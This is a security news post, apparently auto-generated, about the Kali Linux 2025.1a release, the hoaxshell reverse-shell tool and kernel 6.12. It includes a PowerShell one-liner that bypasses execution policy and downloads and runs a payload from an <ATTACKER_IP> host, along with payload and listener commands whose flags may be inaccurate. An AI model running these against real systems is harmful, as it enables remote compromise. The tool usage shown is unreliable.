Kali Linux a Released with New hoaxshell Tool and Kernel Upgrade

By /

Listen to this Post

Kali Linux has announced its 2025.1a release, featuring a new tool and several updates. The most notable addition is hoaxshell, a Windows reverse shell payload generator and handler that abuses HTTP(S) protocols to establish a beacon-like reverse shell. Alongside this, Kali Linux has upgraded its kernel to version 6.12.

Read more: Kali Linux 2025.1a Release

You Should Know:

1. Using hoaxshell for Reverse Shells

hoaxshell is designed to generate and handle Windows reverse shells over HTTP(S), making it stealthier than traditional reverse shells. Below are some practical commands:

Generating a Payload:

python3 hoaxshell.py -g -t windows -o payload.ps1

This generates a PowerShell reverse shell payload.

#### **Starting the Listener:**

python3 hoaxshell.py -l -p 8080

This starts an HTTP listener on port 8080.

#### **Executing the Payload on Target:**

powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>:8080/payload.ps1')"

### **2. Kernel Upgrade to 6.12**

Kali Linux 2025.1a includes Linux Kernel 6.12, which brings improved hardware support and security patches. Verify your kernel version with: 

uname -r

Update Kali to the latest version:

sudo apt update && sudo apt full-upgrade -y

### **3. Other Useful Kali Linux Commands**

  • Network Scanning: 
    nmap -sV -A <TARGET_IP>
  • Password Cracking with Hashcat: 
    hashcat -m 0 hashes.txt rockyou.txt
  • Metasploit Framework: 
    msfconsole

## **What Undercode Say:**

Kali Linux continues to be the go-to platform for penetration testers and security researchers. The addition of hoaxshell provides a new method for stealthy reverse shells, while the Kernel 6.12 upgrade ensures better performance and security.

### **Additional Linux & Windows Security Commands:**

  • Check Open Ports (Linux): 
    ss -tulnp
  • Windows Firewall Rule (Block Port): 
    New-NetFirewallRule -DisplayName "Block Port 4444" -Direction Inbound -LocalPort 4444 -Protocol TCP -Action Block
  • Analyze Logs (Linux): 
    journalctl -u ssh --no-pager | grep "Failed password"
  • Windows Event Log Analysis: 
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625}

## **Expected Output:**

A fully updated Kali Linux 2025.1a system with hoaxshell installed and tested reverse shell functionality, along with a kernel version of 6.12. Security professionals should explore the new tool and updated kernel features for enhanced penetration testing.

For more details: Kali Linux Official Site

References:

Reported By: Activity 7311820460810276864 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: